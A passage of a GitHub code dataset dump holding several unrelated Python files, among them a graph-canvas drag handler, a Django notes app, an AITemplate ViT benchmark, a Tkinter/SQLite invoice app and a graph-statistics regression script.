self.on_element_move_end_event = Event()\n self.on_element_move_start_event = Event()\n\n def on_element_move(self, callback):\n self.on_element_move_end_event += callback\n \n def off_element_move(self, callback):\n self.on_element_move_end_event -= callback\n\n def on_element_move_start(self, callback):\n self.on_element_move_start_event += callback\n \n def off_element_move_start(self, callback):\n self.on_element_move_start_event -= callback\n\n def motion(self, event):\n self.canvas.change_cursor(event)\n\n def drag(self, event):\n if self.draging_node:\n x, y = self.canvas_helper.canvas_to_graph_coords(event.x, event.y)\n self.draging_node.position.x = x\n self.draging_node.position.y = y\n self.draging_node.is_dragged = True\n self.canvas.delete(\"all\")\n self.canvas.draw_edges(self.graph.edges)\n self.canvas.draw_nodes(self.graph.nodes)\n return\n\n self.canvas.scan_dragto(event.x, event.y, gain=1)\n\n def drag_node(self, event):\n x, y = self.canvas_helper.canvas_to_graph_coords(event.x, event.y)\n \n for node in self.graph.nodes:\n if node.is_under_cursor(Vector(x, y)):\n self.draging_node = node\n self.node_old_position = copy(node.position)\n self.on_element_move_start_event(self.draging_node, Vector(x, y))\n self.graph.generator.set_dragged_edges(self.graph.edges, node)\n\n def drag_canvas(self, event):\n if not self.draging_node:\n self.canvas.scan_mark(event.x, event.y)\n\n def end_drag(self, event):\n if self.draging_node:\n x, y = self.canvas_helper.canvas_to_graph_coords(event.x, event.y)\n self.draging_node.is_dragged = False\n self.draging_node.width = self.draw_config.node_width\n self.graph.generator.set_dragged_edges(self.graph.edges, self.draging_node, False)\n self.on_element_move_end_event(self.draging_node, Vector(x, y), self.node_old_position)\n self.draging_node = None\n return\n\n self.canvas.scan_dragto(event.x, event.y, gain=1)\n\n","repo_name":"GenWattStudent/Grafy","sub_path":"src/graph/drag/DragCanvas.py","file_name":"DragCanvas.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11127479597","text":"import os\nimport sys\n\nfrom repology.package import Package\n\n\nclass HaikuPortsFilenamesParser():\n def __init__(self):\n pass\n\n def Parse(self, path):\n result = []\n\n for category in os.listdir(path):\n category_path = os.path.join(path, category)\n if not os.path.isdir(category_path):\n continue\n\n for package in os.listdir(category_path):\n package_path = os.path.join(category_path, package)\n if not os.path.isdir(package_path):\n continue\n\n for recipe in os.listdir(package_path):\n if not recipe.endswith('.recipe'):\n continue\n\n pkg = Package()\n\n pkg.name = package\n pkg.category = category\n\n # may want to shadow haiku-only ports\n #if pkg.category.startswith('haiku-'):\n # pkg.shadow = True\n\n # it seems to be guaranteed there's only one hyphen in recipe filename\n name, version = recipe[:-7].split('-', 1)\n\n if package.replace('-', '_') != name:\n print('WARNING: mismatch for package directory and recipe name: {} != {}'.format(package, name), file=sys.stderr)\n\n pkg.version = version\n\n result.append(pkg)\n\n return result\n","repo_name":"roscopecoltran/sniperkit-services","sub_path":"dockerfiles/vcs/packages/repology/repology/parser/haiku.py","file_name":"haiku.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"74313206249","text":"#!/usr/bin/python3\n\"\"\"\nimport modules\n\"\"\"\nimport unittest\nfrom models.rectangle import Rectangle\n\"\"\"\ntest for __str__\n\"\"\"\n\n\nclass test_str(unittest.TestCase):\n \"\"\"Test on __str___ \"\"\"\n def test_str(self):\n \"\"\"test for __str__ method\"\"\"\n r = Rectangle(4, 6, 2, 1, 12)\n res = \"[Rectangle] (12) 2/1 - 4/6\"\n self.assertEqual(r.__str__(), res)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"IyasuH/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_rectangle_6.py","file_name":"test_rectangle_6.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19816617960","text":"import os\n\nimport click\nimport numpy as np\nimport torch\nfrom aitemplate.compiler import compile_model, Model\n\nfrom aitemplate.frontend import Tensor\nfrom aitemplate.testing import detect_target\n\nfrom modeling.vision_transformer import VisionTransformer\nfrom weight_utils import export_to_torch_tensor\n\n# flake8: noqa\n\n\ndef mark_output(y):\n if type(y) is not tuple:\n y = (y,)\n for i in range(len(y)):\n y[i]._attrs[\"is_output\"] = True\n y[i]._attrs[\"name\"] = \"output_%d\" % (i)\n y_shape = [d._attrs[\"values\"][0] for d in y[i]._attrs[\"shape\"]]\n print(\"output_{} shape: {}\".format(i, y_shape))\n\n\nUSE_CUDA = detect_target().name() == \"cuda\"\n\n\ndef compile_vit(\n model_name,\n batch_size,\n class_token=False,\n global_pool=\"avg\",\n use_fp16_acc=True,\n):\n img_size = 224\n patch_size = 16\n embed_dim = 768\n num_heads = 12\n depth = 12\n if model_name == \"vit_base_patch16_224\":\n img_size = 224\n patch_size = 16\n embed_dim = 768\n num_heads = 12\n depth = 12\n elif model_name == \"vit_large_patch16_384\":\n img_size = 384\n patch_size = 16\n embed_dim = 1024\n num_heads = 16\n depth = 24\n seqlen = (img_size // patch_size) ** 2 + (1 if class_token else 0)\n ait_model = VisionTransformer(\n batch_size=batch_size,\n img_size=img_size,\n class_token=class_token,\n global_pool=global_pool,\n num_heads=num_heads,\n embed_dim=embed_dim,\n patch_size=patch_size,\n depth=depth,\n act_layer=\"GELU\",\n )\n ait_model.name_parameter_tensor()\n inputs_ait = Tensor(\n [batch_size, img_size, img_size, 3], name=\"input0\", is_input=True\n )\n Y = ait_model(inputs_ait)\n mark_output(Y)\n\n target = detect_target(use_fp16_acc=use_fp16_acc)\n exe_module = compile_model(\n Y, target, \"./tmp\", \"vision_transformer_bs%d_seq%d\" % (batch_size, seqlen)\n )\n return exe_module\n\n\ndef benchmark(model_name, batch_size, mod=None, graph_mode=True):\n # load mod\n if model_name == \"vit_base_patch16_224\":\n img_size = 224\n patch_size = 16\n embed_dim = 768\n num_heads = 12\n depth = 12\n elif model_name == \"vit_large_patch16_384\":\n img_size = 384\n patch_size = 16\n embed_dim = 1024\n num_heads = 16\n depth = 24\n else:\n raise NotImplementedError\n\n seqlen = (img_size // patch_size) ** 2\n\n if mod is None:\n model_dir = f\"vision_transformer_bs{batch_size}_seq{seqlen}\"\n mod = Model(os.path.join(\"./tmp\", model_dir, \"test.so\"))\n\n # prepare params\n params_ait = export_to_torch_tensor(model_name)\n if detect_target().name() == \"cuda\":\n ait_key = \"attn_cu_length\"\n for i in range(depth):\n prefix = \"blocks_%d\" % (i)\n cu_len = np.cumsum([0] + [seqlen] * batch_size).astype(\"int32\")\n params_ait[f\"{prefix}_{ait_key}\"] = torch.from_numpy(cu_len).cuda()\n\n # set weights\n mod.set_many_constants_with_tensors(params_ait)\n mod.fold_constants(sync=True)\n\n # prepare input/output tensor\n inputs = [torch.randn([batch_size, img_size, img_size, 3]).cuda().half()]\n ys = []\n num_outputs = len(mod.get_output_name_to_index_map())\n for i in range(num_outputs):\n shape = mod.get_output_maximum_shape(i)\n ys.append(torch.empty(shape).cuda().half())\n # warm up\n t, _, __ = mod.benchmark_with_tensors(\n inputs,\n ys,\n count=100,\n repeat=4,\n graph_mode=graph_mode,\n )\n # benchmark\n t, _, __ = mod.benchmark_with_tensors(\n inputs,\n ys,\n count=100,\n repeat=4,\n graph_mode=graph_mode,\n )\n print(f\"batch_size: {batch_size}, latency: {t}\")\n dev_flag = os.environ.get(\"HIP_VISIBLE_DEVICES\", \"-1\")\n dev_flag = dev_flag.replace(\",\", \"_\")\n with open(f\"{model_name}_ait_benchmark_dev_{dev_flag}.txt\", \"a\") as f:\n f.write(f\"batch_size: {batch_size}, latency: {t}\\n\")\n\n\n@click.command()\n@click.option(\"--model-name\", type=str, default=\"vit_base_patch16_224\")\n@click.option(\n \"--use-fp16-acc\",\n type=bool,\n default=True,\n help=\"Whether to use FP16 for accumulation (similar to TensorRT)\",\n)\n@click.option(\"--use-graph\", type=bool, default=True, help=\"Whether to use CUDA graph\")\n@click.option(\"--batch-size\", type=int, default=0, help=\"Batch size\")\ndef main(\n model_name=\"vit_base_patch16_224\", use_fp16_acc=True, use_graph=True, batch_size=0\n):\n if detect_target().name() == \"rocm\":\n use_graph = False\n if batch_size < 1:\n for bs in (1, 2, 4, 8, 16, 32, 64, 128, 256):\n compile_vit(model_name, bs, use_fp16_acc=use_fp16_acc)\n benchmark(model_name, bs, graph_mode=use_graph)\n else:\n benchmark(model_name, batch_size, graph_mode=use_graph)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"facebookincubator/AITemplate","sub_path":"examples/04_vit/benchmark_ait.py","file_name":"benchmark_ait.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"10732014565","text":"from django.shortcuts import render ,redirect , get_object_or_404\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\nfrom .models import Note\nfrom .forms import NoteForm\nfrom django.contrib import messages\nfrom accounts.models import Profile\n\n\n# Create your views here.\n\ndef all_notes(request):\n if request.user.is_authenticated: \n user = request.user\n profile = get_object_or_404(Profile,user=user)\n all_notes = Note.objects.filter(user=user)\n context = {\n 'all_notes': all_notes,\n 'profile':profile\n }\n return render(request,'notes.html',context)\n else:\n return redirect('/accounts/login')\n\ndef note_details(request,slug):\n note = Note.objects.get(slug=slug)\n if request.user.is_authenticated:\n user = request.user\n profile = get_object_or_404(Profile,user=user)\n context={\n 'note':note,\n 'profile':profile\n }\n \n return render(request,'one_note.html',context)\n else:\n context={\n 'note':note,\n \n }\n \n return render(request,'one_note.html',context)\n\ndef add_notes(request):\n if request.user.is_authenticated:\n user = request.user\n profile = get_object_or_404(Profile,user=user)\n if request.method == 'POST':\n form = NoteForm(request.POST,request.FILES) # constructor\n\n if form.is_valid():\n new_form = form.save(commit=False) # class instance or object\n new_form.user = request.user\n new_form.save()\n messages.success(request,'Note has been created successfully.') \n return redirect('/notes')\n else:\n form = NoteForm() \n\n else:\n return redirect('/accounts/login')\n\n context = {\n 'form':form,\n 'profile':profile\n }\n\n return render(request,'add_note.html',context)\n \ndef note_edit(request,slug):\n if request.user.is_authenticated:\n user = request.user\n profile = get_object_or_404(Profile,user=user)\n note = Note.objects.get(slug=slug)\n if request.method == 'POST': #means you clicked the button :D\n form = NoteForm(request.POST,request.FILES,instance=note)\n \n if form.is_valid():\n new_form = form.save(commit=False) # class instance or object\n new_form.user = request.user\n new_form.save()\n messages.success(request, 'Note has been updated successfully.') \n return redirect('/notes')\n else:\n form = NoteForm(instance=note) \n\n context = {\n 'form':form,\n 'profile':profile\n }\n\n return render(request,'edit_note.html',context)\n else:\n return redirect('/accounts/login')\n","repo_name":"wafaaxdev/NotesApp","sub_path":"notes_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74949955368","text":"import math\ndef sd_function(numbers):\n 'self-defined sd function'\n N=len(numbers)\n summation = 0\n another_summation = 0\n for number in numbers:\n summation += number\n mu = summation / N\n for number in numbers:\n another_summation += (number - mu)**2\n return(math.sqrt(another_summation/N)) \nmy_list = range(1,6)\nprint(sd_function(my_list))\n\nhelp(sd_function)","repo_name":"Tingparticle/midterm-hw2","sub_path":"HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13376098950","text":"import pandas as pd\n\ncoin_list = ['BCH', 'Cardona', 'dogecoin', 'EOS', 'ETH', 'LTC', 'XRP', 'BNB']\n\ndfSubRed = pd.DataFrame()\ndfNA = pd.DataFrame()\nfor scoin in coin_list:\n dfTemp = pd.read_csv(scoin + '_sentiment.csv', index_col=0)\n dfSubRed = pd.concat([dfSubRed,pd.DataFrame(dfTemp.subreddit.value_counts()[:15].index),pd.DataFrame(dfTemp.subreddit.value_counts()[:15].values)], axis=1)\n\n\ndfNA = pd.read_csv('Monero_sentiment.csv', index_col=0)\ndfNA['body'].isna().sum()\n\n# initialize sentiment classifier\nsia = SIA()\n\n# get sentiment\nsentiment = dfTemp['body'].apply(sia.polarity_scores)\n\n# create sentiment df\nsentiment = pd.DataFrame(sentiment.tolist())\ndfTemp = dfTemp.reset_index(drop = True)\n# merge sentiment with your df\n\ndf = dfTemp.merge(sentiment, how='left', left_index=True, right_index=True) # Her den kommer fejlen!\ndf['sentiment'] = df['compound'].apply(categorize_sentiment)\ndf['sentiment'] = pd.Categorical(df['sentiment'])\nbinary_sentiment = df['sentiment'].str.get_dummies()\n\ndf = df.merge(binary_sentiment, how='left', left_index=True, right_index=True)","repo_name":"emborg60/EAP_EF","sub_path":"Kode/Subreddit check.py","file_name":"Subreddit check.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72921481128","text":"from Facturas import Facturas\nimport ttkbootstrap as ttk\nfrom ttkbootstrap.constants import *\nfrom tkinter import messagebox\nfrom datetime import date\nimport sqlite3\nimport os\n\ndef main():\n\n proyecto = os.path.dirname(os.path.abspath(__file__))\n os.chdir(proyecto)\n \n facturas = Facturas()\n\n conn = sqlite3.connect('./facturas.db')\n cursor = conn.cursor()\n \n root = ttk.Window(themename=\"minty\")\n root.title(\"Facturas\")\n root.geometry(\"400x380\")\n root.resizable(False, False)\n\n # Sections\n program = ttk.Frame(root)\n program.pack()\n \n # Functions\n def generarFactura():\n try:\n nombreEmisor = str(emisor.get())\n \n nombreCliente = str(cliente.get())\n cliente.delete(0, \"end\")\n \n consumokWh = int(consumido.get())\n consumido.delete(0, \"end\")\n \n precio = round(facturas.nuevaFactura(consumokWh), 3)\n \n conn.execute('''INSERT INTO listaFacturas (Emisor, Cliente, Consumo_kWh, Precio) VALUES (?, ?, ?, ?)''', (nombreEmisor, nombreCliente, consumokWh, precio))\n conn.commit()\n\n except ValueError:\n messagebox.showinfo(title=\"Error\", message=\"Asegurate de que ingresar el tipo de dato correspondiente y de no dejar espacios vacios.\")\n\n # Nueva ventana \n def verFacturas():\n \n ventanaFacturas = ttk.Toplevel(pady=(10))\n ventanaFacturas.title(\"Lista de Facturas\")\n ventanaFacturas.geometry(\"400x450\")\n ventanaFacturas.resizable(False, False)\n \n # Nueva ventana\n def factura(event):\n \n # Widgets dentro de la ventana\n factura = ttk.Toplevel(padx=10, pady=10)\n factura.title(\"Factura\")\n factura.geometry(\"250x310\")\n factura.resizable(False, False)\n \n itemSeleccionado = event.widget.selection()[0]\n columnaId = event.widget.item(itemSeleccionado, \"values\")[0]\n \n cursor.execute(f\"SELECT Fecha, Cliente, Emisor, Consumo_kWh, Precio FROM listaFacturas WHERE idFactura={columnaId}\")\n datos = cursor.fetchone()\n \n titulo = ttk.Label(factura, text=\"FACTURA\", font=(\"Helvetica\", 20, \"bold\"))\n titulo.pack()\n \n fecha = ttk.Label(factura, text=datos[0], font=(\"Helvetica\", 13))\n fecha.pack()\n \n clienteString = f\"\\nCliente\\n{datos[1]}\\n\\nConsumió\"\n cliente = ttk.Label(factura, text=clienteString, font=(\"Helvetica\", 13))\n cliente.pack()\n cliente.configure(justify=\"center\", anchor=\"center\")\n \n consumoString = f\"{datos[3]}kWh\"\n consumo = ttk.Label(factura, text=consumoString, font=(\"Helvetica\", 13, \"bold\"))\n consumo.pack()\n consumo.configure(justify=\"center\", anchor=\"center\")\n \n precioString = f\"\\nDebe pagar RD${datos[4]}\"\n precio = ttk.Label(factura, text=precioString, font=(\"Helvetica\", 13))\n precio.pack()\n precio.configure(justify=\"center\", anchor=\"center\")\n \n emisorString = f\"\\nFue atendido por:\\n{datos[2]}\\n\"\n emisor = ttk.Label(factura, text=emisorString, font=(\"Helvetica\", 13))\n emisor.pack()\n emisor.configure(justify=\"center\", anchor=\"center\")\n \n # Funciones\n def cargarFilas():\n cursor.execute(f\"SELECT idFactura, Cliente, Fecha FROM listaFacturas\")\n fila = cursor.fetchone()\n \n while fila != None:\n tabla.insert(parent=\"\", index=\"end\", values=(fila[0], fila[1], fila[2]))\n fila = cursor.fetchone()\n \n def recargar():\n tabla.delete(*tabla.get_children())\n cargarFilas()\n \n # Tabla\n tabla = ttk.Treeview(ventanaFacturas, columns=(\"ID\", \"cliente\", \"fecha\"), bootstyle=\"INFO\", height=\"20\")\n \n tabla.heading(\"ID\", text=\"ID\", anchor=\"w\")\n tabla.heading(\"cliente\", text=\"Clientes\", anchor=\"w\")\n tabla.heading(\"fecha\", text=\"Fecha\", anchor=\"w\")\n \n tabla.column(\"#0\", width=0, stretch=False)\n tabla.column(\"ID\", width=\"80\")\n tabla.column(\"cliente\", width=\"150\")\n tabla.column(\"fecha\", width=\"120\")\n \n tabla.bind(\"\", factura)\n \n tabla.pack(padx=20, pady=5)\n \n cargarFilas()\n \n # Widgets dentro de la ventana\n footer = ttk.Label(ventanaFacturas, text=\"Haz doble clic en cualquiera de los clientes para visualizar su factura\")\n footer.pack(pady=\"10\")\n \n recargar = ttk.Button(ventanaFacturas, text=\"Recargar\", command=recargar, padding=(20, 10))\n recargar.pack(pady=\"5\")\n \n \n # Widgets\n fechaActual = date.today().strftime(\"%d/%m/%Y\")\n fecha = ttk.Label(program, text=fechaActual, font=(\"Helvetica\", 12, \"bold\"), padding=(0, 15, 0, 10))\n fecha.pack()\n \n emisorTitle = ttk.Label(program, text=\"Ingrese su nombre *\", font=(\"Helvetica\", 12), padding=(0, 0, 0, 15))\n emisorTitle.pack()\n \n emisor = ttk.Entry(program, width=\"40\")\n emisor.pack()\n \n clienteTitle = ttk.Label(program, text=\"Ingrese el nombre del cliente *\", font=(\"Helvetica\", 12), padding=(0, 15, 0, 15))\n clienteTitle.pack()\n \n cliente = ttk.Entry(program, width=\"40\")\n cliente.pack()\n \n consumidoTitle = ttk.Label(program, text=\"¿Cuánto consumió el cliente? *\", font=(\"Helvetica\", 12), padding=(0, 15, 0, 15))\n consumidoTitle.pack()\n \n consumido = ttk.Entry(program, width=\"40\")\n consumido.pack(pady=\"0, 30\")\n \n generarFactura = ttk.Button(program, text=\"Generar Factura\", padding=(20, 10), command=generarFactura)\n generarFactura.pack(side=LEFT, padx=\"0, 10\")\n \n verFacturas = ttk.Button(program, text=\"Ver Facturas\", bootstyle=\"INFO\", padding=(30, 10), command=verFacturas)\n verFacturas.pack(side=RIGHT, padx=\"10, 0\")\n \n root.mainloop()\n \nif __name__ == \"__main__\":\n main()","repo_name":"L1nk01/Facturas","sub_path":"main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":6132,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69820255210","text":"from typing import Callable\n\n\nclass pipe:\n\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n def __add__(self, other):\n ...\n\n def __or__(self, other):\n # print(f'__or__: {other=}')\n\n if isinstance(other, pipe) and len(other.args) == 1 and isinstance(other.args[0], Callable):\n return other(*self.args, **self.kwargs)\n elif isinstance(other, pipe):\n return pipe(*self.args, *other.args, **{**self.kwargs, **other.kwargs})\n elif isinstance(other, Callable):\n return other(*self.args, **self.kwargs)\n\n else:\n raise TypeError(f\"unsupported operand type(s) for |: '{type(other)}' and '{type(self)}'\")\n\n def __ror__(self, other):\n # print(f'__ror__: {other=}')\n\n if len(self.args) == 1 and isinstance(self.args[0], Callable):\n return self(other)\n elif isinstance(other, pipe):\n return pipe((*other.args, *self.args), {**other.kwargs, **self.kwargs})\n else:\n return pipe(other)\n\n def __call__(self, *args, **kwargs):\n func = self.args[0]\n assert isinstance(func, Callable)\n return pipe(func(*args, **kwargs))\n\n\nif __name__ == '__main__':\n [i for i in range(100)] | pipe(sum) | print\n\n # pipe(1, foo=1) | pipe(2, bar=2) | (lambda *args, **kwargs: pipe(str(args) + \" \" + str(kwargs))) | print\n","repo_name":"ValentinKolb/playground","sub_path":"pipe.py","file_name":"pipe.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22289510747","text":"import json\nimport csv\nimport matplotlib.pyplot as plt\nfrom scipy.stats import linregress\nimport os\nimport numpy as np\nfrom scipy import interpolate\nfrom statistics import *\n\ndef traitement(name, y):\n list_dir = os.listdir(name)\n coords = []\n for dir in list_dir:\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n print(dir, dir2)\n try:\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n coord = (data[\"nb_nodes\"], data[y])\n coords.append(coord)\n except:\n print(\"oups\", dir, dir2)\n return coords\n\n\ndef traitement_nodes(name, x, y):\n list_dir = os.listdir(name)\n coords = []\n for dir in list_dir:\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n print(dir, dir2)\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n for n in data[x]:\n coord = (data[x][n], data[y][n])\n coords.append(coord)\n return coords\n\n\ndef traitement_nb_nodes_minmoymaxvar(name, n, y):\n list_dir = os.listdir(name)\n l = []\n for dir in list_dir:\n if dir.startswith('n' + str(n)):\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n if data[\"nb_nodes\"] == n:\n l.append(data[y])\n return min(l), mean(l), max(l), variance(l)\n\n\ndef traitement_par_nb_nodes(name, y, nb_max):\n coords = []\n for n in range(3, nb_max + 1):\n coords.append(traitement_nb_nodes_minmoymaxvar(name, n, y))\n return coords\n\n\ndef traitement_nb_nodes(name, n, y):\n list_dir = os.listdir(name)\n l = []\n for dir in list_dir:\n if dir.startswith('n' + str(n)):\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n if data[\"nb_nodes\"] == n:\n l.append(data[y])\n return l\n\n\ndef traitement_par_nb_nodes_list(list, y, nb_max):\n coords = []\n for n in range(3, nb_max + 1):\n l = []\n mini = []\n moy = []\n maxi = []\n var = []\n for name in list:\n try:\n coord = traitement_nb_nodes_minmoymaxvar(name, n, y)\n mini.append(coord[0])\n moy.append(coord[1])\n maxi.append(coord[2])\n var.append(coord[3])\n except:\n print(\"oups\", name, n)\n coords.append((min(mini), mean(moy), max(maxi), variance(var)))\n return coords\n\n\ndef traitement_diam(name):\n list_dir = os.listdir(name)\n l = []\n for dir in list_dir:\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n l.append((data[\"nb_nodes\"], data[\"diameter\"], data[\"nb_attributs\"]))\n return l\n\n\ndef traitement_dens(name):\n list_dir = os.listdir(name)\n l = []\n for dir in list_dir:\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n print(dir, dir2)\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n l.append((data[\"nb_nodes\"], data[\"density\"], data[\"nb_attributs\"]))\n return l\n\n\n# plt.plot(np.arange(3, 18), np.array(l1[1]), label=\"Barabasi_Albert\")\n# plt.plot(np.arange(3, 21), np.array(l2[1]), label=\"Erdos_Renyi\")\n# plt.plot([3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17], l[1])\n# plt.legend()\n# plt.show()\n\n\ndef regression_exp(y, n, title):\n a_min, b_min, r_min, p_value_min, std_err_min = linregress(np.arange(3, n + 1), np.log(np.array(y[0])))\n a_max, b_max, r_max, p_value_max, std_err_max = linregress(np.arange(3, n + 1), np.log(np.array(y[1])))\n plt.plot(np.arange(3, n + 1), np.log(np.array(y[0])), label=\"Minimum\")\n plt.plot(np.arange(3, n + 1), a_min * np.arange(3, n + 1) + b_min, label=\"Regression exponentielle minimum\")\n plt.plot(np.arange(3, n + 1), np.log(np.array(y[1])), label=\"Maximum\")\n plt.plot(np.arange(3, n + 1), a_max * np.arange(3, n + 1) + b_max, label=\"Regression exponentielle maximum\")\n plt.title(title)\n plt.legend()\n\n\ndef regression_poly_et_exp(y, n, title):\n plt.figure()\n\n a_min, b_min, r_min, p_value_min, std_err_min = linregress(np.arange(3, n + 1), np.log(np.array(y[0])))\n a_moy, b_moy, r_moy, p_value_moy, std_err_moy = linregress(np.arange(3, n + 1), np.log(np.array(y[1])))\n a_max, b_max, r_max, p_value_max, std_err_max = linregress(np.arange(3, n + 1), np.log(np.array(y[2])))\n\n plt.subplot(221)\n plt.plot(np.arange(3, n + 1), np.array(y[0]), '+', label=\"Minimum\")\n plt.plot(np.arange(3, n + 1), np.exp(b_min + a_min * np.arange(3, n + 1)),\n label=\"$y = \" + str(round(np.exp(b_min), 2)) + 'e^{' + str(round(a_min, 2)) + 'x} - r = ' + str(\n round(r_min, 3)) + '$')\n coefs = np.polyfit(np.arange(3, n + 1), np.array(y[0]), 2)\n R2 = ((coefs[0] * np.arange(3, n + 1) ** 2 + coefs[1] * np.arange(3, n + 1) + coefs[2] - np.array(\n y[0]).mean()) ** 2).sum() / ((np.array(y[0]) - np.array(y[0]).mean()) ** 2).sum()\n plt.plot(np.arange(3, n + 1), coefs[0] * np.arange(3, n + 1) ** 2 + coefs[1] * np.arange(3, n + 1) + coefs[2],\n label=\"$y = \" + str(round(coefs[0], 2)) + 'x^2 + ' + str(round(coefs[1], 2)) + 'x + ' + str(\n round(coefs[2], 2)) + ' - r = ' + str(round(np.sqrt(R2), 3)) + '$')\n plt.title(title + ' - Minimum')\n plt.legend()\n plt.xlim([2, n + 1])\n plt.xticks(np.arange(3, n + 1))\n plt.xlabel(\"Nombre de noeuds\")\n plt.ylabel(\"Nombre d'attributs minimal\")\n\n plt.subplot(222)\n plt.plot(np.arange(3, n + 1), np.array(y[1]), '+', label=\"Moyenne\")\n plt.plot(np.arange(3, n + 1), np.exp(b_moy + a_moy * np.arange(3, n + 1)),\n label=\"$y = \" + str(round(np.exp(b_moy), 2)) + 'e^{' + str(round(a_moy, 2)) + 'x} - r = ' + str(\n round(r_moy, 3)) + '$')\n coefs = np.polyfit(np.arange(3, n + 1), np.array(y[1]), 2)\n R2 = ((coefs[0] * np.arange(3, n + 1) ** 2 + coefs[1] * np.arange(3, n + 1) + coefs[2] - np.array(\n y[1]).mean()) ** 2).sum() / ((np.array(y[1]) - np.array(y[1]).mean()) ** 2).sum()\n plt.plot(np.arange(3, n + 1), coefs[0] * np.arange(3, n + 1) ** 2 + coefs[1] * np.arange(3, n + 1) + coefs[2],\n label=\"$y = \" + str(round(coefs[0], 2)) + 'x^2 + ' + str(round(coefs[1], 2)) + 'x + ' + str(\n round(coefs[2], 2)) + ' - r = ' + str(round(np.sqrt(R2), 3)) + '$')\n plt.title(title + ' - Moyenne')\n plt.legend()\n plt.xlim([2, n + 1])\n plt.xticks(np.arange(3, n + 1))\n plt.xlabel(\"Nombre de noeuds\")\n plt.ylabel(\"Nombre d'attributs moyen\")\n\n plt.subplot(223)\n plt.plot(np.arange(3, n + 1), np.array(y[2]), '+', label=\"Maximum\")\n plt.plot(np.arange(3, n + 1, 0.1), np.exp(b_max + a_max * np.arange(3, n + 1, 0.1)),\n label=\"$y = \" + str(round(np.exp(b_max), 2)) + 'e^{' + str(round(a_max, 2)) + 'x} - r = ' + str(\n round(r_max, 3)) + '$')\n coefs = np.polyfit(np.arange(3, n + 1), np.array(y[2]), 2)\n R2 = ((coefs[0] * np.arange(3, n + 1) ** 2 + coefs[1] * np.arange(3, n + 1) + coefs[2] - np.array(\n y[2]).mean()) ** 2).sum() / ((np.array(y[2]) - np.array(y[2]).mean()) ** 2).sum()\n plt.plot(np.arange(3, n + 1, 0.1),\n coefs[0] * np.arange(3, n + 1, 0.1) ** 2 + coefs[1] * np.arange(3, n + 1, 0.1) + coefs[2],\n label=\"$y = \" + str(round(coefs[0], 2)) + 'x^2 + ' + str(round(coefs[1], 2)) + 'x + ' + str(\n round(coefs[2], 2)) + ' - r = ' + str(round(np.sqrt(R2), 3)) + '$')\n plt.title(title + ' - Maximum')\n plt.legend()\n plt.xlim([2, n + 1])\n plt.xticks(np.arange(3, n + 1))\n plt.xlabel(\"Nombre de noeuds\")\n plt.ylabel(\"Nombre d'attributs maximal\")\n\n plt.subplot(224)\n plt.plot(np.arange(3, n + 1), np.array(y[3]), '+', label=\"Variance\")\n plt.title(title + ' - Variance')\n plt.legend()\n plt.xlim([2, n + 1])\n plt.xticks(np.arange(3, n + 1))\n plt.xlabel(\"Nombre de noeuds\")\n plt.ylabel(\"Variance\")\n\n\n# ### Barabasi-Albert : Maximum, Minimum, Moyenne, Variance et Nuage de points ###\n#\n# data_ba = traitement(\"Barabasi_Albert\", \"nb_attributs\")\n# l1 = [*zip(*data_ba)]\n# plt.figure()\n# plt.plot(np.array(l1[0]), np.array(l1[1]), '+')\n# plt.title(\"Nombre d'attributs en fonction du nombre de sommets - Barabasi-Albert\")\n# plt.xlim([2, 17])\n# plt.xticks(np.arange(3, 17))\n# plt.xlabel(\"Nombre de noeuds\")\n# plt.ylabel(\"Nombre d'attributs\")\n#\n# data_ba = traitement_par_nb_nodes(\"Barabasi_Albert\", \"nb_attributs\", 17)\n# l1 = [*zip(*data_ba)]\n# regression_poly_et_exp(l1, 17, \"Barabasi-Albert\")\n#\n#\n# ### Erdos-Renyi : Maximum, Minimum, Moyenne, Variance et Nuage de points ###\n#\n# data_er = traitement(\"Erdos_Renyi\", 